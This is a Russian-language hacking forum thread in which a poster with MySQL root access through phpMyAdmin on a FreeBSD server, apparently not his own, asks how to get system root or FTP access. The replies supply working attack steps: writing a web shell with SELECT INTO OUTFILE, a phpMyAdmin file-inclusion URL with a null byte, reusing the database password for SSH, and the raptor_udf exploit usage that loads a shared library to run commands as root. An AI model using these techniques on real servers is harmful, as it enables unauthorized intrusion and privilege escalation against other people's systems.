Имею рута Mysql на FreeBSD - помогите поиметь больше

Имею рута Mysql на FreeBSD - помогите поиметь больше

Есть сервер FreeBSD
на нем через phphmyadmin имею рутовский доступ к mysql
Welcome to phpMyAdmin 2.6.1-pl2
MySQL 4.1.14 running on localhost as root@localhost

посмотрел через LOAD_FILE данные - нашел 1 домен на сервере
посмотрел папки что в корне домена - нет ниодной с правами записаи

Помогите с технологией - как поиметь рута или фтп на этом сервере

p.s. то Админы - третий раз пишу этот пост - что то в дргом разделе не проходил он
если вдруг вылезут все мессаджи -то не ругайте - а просто кильните все кроме этого

 

Залей шелл, через мускл.....подробнее здесь

 

я написал в первом посту что папок для записи в вебовской директории необнаружено.
поэтому не могу выполнить
select 'test' into outfile '/www/xx/xxxxxxxx.com/test.php';

вываливается
#1 - Can't create/write to file '/www/xx/xxxxxxxx.com/test.php' (Errcode: 13)

путь такой существует - если ошибаюсь с путем то вываливается (Errcode: 2)

подскажите - что можно сделать в такой ситуации

p.s нашел phpinfo на этой машинке
выдает
PHP Version 5.2.1

 

ищи дир доступную на запись.. аеще луче делай шелл инто аутфайл а потом

сайт/phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=блабла%00

инклудь тот шелл что в тмп.. версия как раз подходящая

 

неужели в базе нет полезной инфы?

 

Имея рута в mysql не означает, что ты имеешь рут в самой системе. Просто у тебя есть максимальные права на управление базой. Вот и все. Залив шелл у тебя будет обычный шелл с правами вебсервера, но никак не с root

 

для начала попробуй войти под рутом, либо админом по ssh с тем же паролем что и к бд.

 

http://milw0rm.com/exploits/1181
http://milw0rm.com/exploits/1518

Code:

 * Usage:
 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf.c
 * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
 * mysql> create function do_system returns integer soname 'raptor_udf.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+---------------+----------+
 * | name      | ret | dl            | type     |
 * +-----------+-----+---------------+----------+
 * | do_system |   2 | raptor_udf.so | function |
 * +-----------+-----+---------------+----------+
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]

всё что те осталось это шелл и удача

 

вот именно что интерактивный шелл нужен))